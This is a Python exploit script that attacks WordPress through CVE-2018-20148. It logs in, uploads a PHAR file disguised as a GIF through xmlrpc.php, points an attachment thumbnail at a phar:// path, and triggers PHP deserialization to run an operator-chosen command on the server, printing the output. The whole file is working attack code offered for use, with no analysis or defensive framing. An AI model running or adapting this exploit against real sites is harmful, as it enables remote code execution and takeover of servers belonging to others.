exploit.py

import logging
import argparse
import random
from bs4 import BeautifulSoup
import re
import base64
import requests
import subprocess

base_url = None
username = None
password = None
command = None
sess = requests.Session()
logging.basicConfig(level=logging.INFO, format='%(levelname)s - %(message)s')


def gen_phar():
    logging.info('creating phar...')
    subprocess.run(["php", "./gen_phar.php", command])


def upload_file(phar_file='phar.phar'):
    with open(phar_file, 'rb') as f:
        b64 = base64.b64encode(f.read())
    PAYLOAD = """
    <?xml version="1.0"?>
<methodCall>
 <methodName>wp.uploadFile</methodName>
 <params>
 <param>
<value>
 <string>1</string>
 </value>
</param>
 <param>
<value>
 <string>{username}</string>
 </value>
</param>
 <param>
<value>
 <string>{password}</string>
 </value>
</param>
<param>
 <value>
<struct>
 <member><name>name</name><value>{file_name}.gif</value></member>
 <member><name>type</name><value>image/gif</value></member>
 <member><name>bits</name><value><base64>{b64}</base64></value></member>
</struct>
 </value>
 </param>
</params>
</methodCall>
    """
    logging.info('uploading phar...')
    file_name = str(random.randint(100, 999))
    payload_send = PAYLOAD.format(username=username, password=password, b64=b64.decode(), file_name=file_name)
    headers = {'Content-type': 'text/xml'}
    # TODO: handle more specific exceptions
    try:
        res = sess.post(base_url + '/xmlrpc.php', headers=headers, data=payload_send)
        assert res.status_code == 200
    except Exception:
        raise RuntimeError('wrong url')
    # extract upload_path and id
    try:
        pattern1 = 'url</name><value><string>([^<>]*)'
        pattern2 = 'id</name><value><string>(\d+)'
        upload_path = re.search(pattern1, res.text).group(1)
        id = re.search(pattern2, res.text).group(1)
        return upload_path, id
    except Exception:
        raise RuntimeError('wrong username and/or password')


def login():
    logging.info('logging in...')
    data = {'log': username, 'pwd': password, 'testcookie': 1, 'wp-submit': 'Log In',
            'redirect_to': base_url + '/wp-admin'}
    res = sess.post(base_url + '/wp-login.php', data=data)
    assert res.status_code == 200


def get_nonce(id):
    res = sess.get(base_url + f'/wp-admin/post.php?post={id}&action=edit')
    assert res.status_code == 200
    soup = BeautifulSoup(res.text, 'html.parser')
    nonce = soup.find(id='_wpnonce').get('value')
    http_referer = soup.find('input', {'name': '_wp_http_referer'}).get('value')
    return nonce, http_referer


def set_file(nonce, http_referer, id):
    logging.info('setting file...')
    data = {'_wpnonce': nonce, '_wp_http_referer': http_referer,
            'action': 'editpost', 'post_type': 'attachment',
            'file': 'Z:\Z', 'post_ID': id}
    res = sess.post(base_url + '/wp-admin/post.php', data=data, allow_redirects=False)
    assert res.status_code == 302


def set_thump(nonce, http_referer, id, thump_path):
    logging.info('setting thumb...')
    data = {'_wpnonce': nonce, '_wp_http_referer': http_referer,
            'action': 'editattachment', 'thumb': thump_path, 'post_ID': id}
    res = sess.post(base_url + '/wp-admin/post.php', data=data, allow_redirects=False)
    assert res.status_code == 302


def trigger_phar(id):
    PAYLOAD = """
    <?xml version="1.0"?>
<methodCall>
 <methodName>wp.getMediaItem</methodName>
 <params>
 <param>
<value>
 <string>1</string>
 </value>
</param>
 <param>
<value>
 <string>{username}</string>
 </value>
</param>
 <param>
<value>
 <string>{password}</string>
 </value>
</param>
<param>
       <value>
         <int>{id}</int>
       </value>
     </param>
</params>
</methodCall>
    """
    logging.info('triggering phar payload...')
    data = PAYLOAD.format(username=username, password=password, id=id)
    res = sess.post(base_url + '/xmlrpc.php', data=data)
    assert res.status_code == 200
    start_index = res.text.index('</methodResponse>') + len('</methodResponse>')
    return res.text[start_index:]


def parse_args():
    parser = argparse.ArgumentParser(description='Exploit CVE-2018-20148.')
    parser.add_argument('url', help='Target Wordpress URL')
    parser.add_argument('username', help='Username of Wordpress account')
    parser.add_argument('password', help='Password of Wordpress account')
    parser.add_argument('command', help='Command to run')
    return parser.parse_args()


def main():
    args = parse_args()
    global base_url, username, password, command
    base_url, username, password, command = args.url, args.username, args.password, args.command
    try:
        gen_phar()
        upload_path, my_id = upload_file()
        thump_path = 'phar://./' + upload_path[upload_path.index('wp-content'):]
        login()
        nonce, http_referer = get_nonce(id=my_id)
        set_file(nonce, http_referer, my_id)
        set_thump(nonce, http_referer, my_id, thump_path)
        command_output = trigger_phar(my_id)
        print("\nCommand output: ", command_output)
    except Exception as e:
        logging.error(e)


if __name__ == '__main__':
    main()